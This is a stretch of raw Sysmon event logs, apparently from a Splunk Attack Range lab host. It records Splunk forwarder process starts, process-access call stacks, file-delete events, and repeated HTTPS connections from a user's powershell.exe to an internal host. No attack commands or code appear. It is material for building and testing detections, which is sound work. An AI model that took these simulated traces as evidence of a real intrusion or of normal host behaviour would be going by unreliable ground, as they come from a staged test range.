354300x800000000000000035341897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:29.099{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52358-false10.0.1.12-8000- 10341000x800000000000000035341896Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.300{B81B27B7-7240-613B-20B4-03000000C801}5472532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341895Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.083{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7240-613B-20B4-03000000C801}5472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341894Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.083{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341893Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.083{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341892Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.083{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341891Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.083{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341890Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.083{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-7240-613B-20B4-03000000C801}5472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341889Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.083{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7240-613B-20B4-03000000C801}5472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341888Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:04.069{B81B27B7-7240-613B-20B4-03000000C801}5472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035341911Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:05.719{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDAE185F24CCE7950930B0F866F8BF51,SHA256=E772248F5C9A30B03D65B17578846EB4231072162196E10A38F43EF121EC1C75,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341910Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:30.897{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52359-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341909Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:05.104{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BBC194C0192761D98AC066FE4155F230,SHA256=1B07BE642AF0747ECF3A489083D4E6BA279D8C2D72F61E1077EE2DF6BA5F5E0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341908Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:05.104{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F5F76FF62FDB6855B394D34551CA349A,SHA256=4A4D7B16CC7B850E461550437A4553F15D278C98AB6470D6C31B4C8C404CE464,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341912Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:06.738{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0FB4D8CA8B2A5A37E493AB05FED6644,SHA256=0BC455667CB87E843D35854E7E9F537C13D8C4EF4B144173E7F135A91B93A63B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341913Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:07.754{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32BE013AC6FFD3C802AE6C0487F94D85,SHA256=22433C9F5996A43193179E41078980DE0445410FDE48A0736AE4F15C14526F3F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341914Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:08.769{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4051CF083318C366D5FFCBE59EBA7ACE,SHA256=6874E45E4B0923C9A2CE90E41B26B017728049EF4476489F5F92F9C3C6BCFAC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341916Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:09.783{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB8B876A186C1C21D5FB5E07DA7C4479,SHA256=D62C793E33C86D97C21867605C1E76A227DEC2DADE87C38D9B2F4EE6FB4838BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341915Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:34.114{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52360-false10.0.1.12-8000- 23542300x800000000000000035341917Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:10.799{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02A0E5BCF40099BFCC6CD0B2E096EDF0,SHA256=5279C67202B3196290E5FD2B32AA5E0C92DD3EB85BA59EC9C826A32F7DD0D2BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341920Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:11.833{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEE528D3DB0D02EBCB668B79ABF647D3,SHA256=3BD004C48F60D0CDBCA07FF3D8FDF4397622312C9F8BA3C88D9572BC2BB46473,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341919Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:36.928{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52361-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341918Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:11.068{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6F30EDA0CE9D068752C989C111C8156D,SHA256=5402EADB9FAB824B391127A324EBA86CAAB04ED0EFBB7351282ED785DE746143,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341921Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:12.851{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=611DF13DA575B8E140B9637673B3E16B,SHA256=41136D2DDA86C04616DAAE58D44EB7AD8C6FC39B4563FB505DC184DDDA0A7AF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341923Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:13.865{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B78FB7801D99DFF03EA93920173EB288,SHA256=75E32184E23EE57F16CACDB5C3714B699250140B848A85C8B22FD43294B7D0BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341922Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:39.227{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52362-false10.0.1.12-8000- 23542300x800000000000000035341924Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:14.881{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28091687EB8C2676B7E0EDCDEA038C2D,SHA256=D6FC8D9D16CE8023F8177E00D3FAE05C71BADB3182AEBBA1A7DCB54F5E9C47B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341927Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:40.948{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52363-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341926Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:15.896{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=475B6B3EBF6917298782BF2C56DAC895,SHA256=8612C0E71162A429C2147E351A6E45E36463D2A3C77211B5968E8DDABFD194B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341925Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:15.049{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F6CC3C116EBB02CCED977ADB6B702944,SHA256=3E7F0FB6833E757E0F28F93FDD5ED21D5115E9492DED9E64E4FB65723E06EB36,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341928Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:16.911{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=183007AA3273941D308FB45195F79A71,SHA256=1A7795C69B59A81C7CAB03EF26D0C6EE2528E1FDB5075D79745D4EF9CD6F6DC2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341945Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.965{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-724D-613B-23B4-03000000C801}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341944Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.965{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-724D-613B-23B4-03000000C801}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341943Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.965{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341942Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.965{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.965{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341940Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.965{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.965{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-724D-613B-23B4-03000000C801}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:17.950{B81B27B7-724D-613B-23B4-03000000C801}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035341937Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 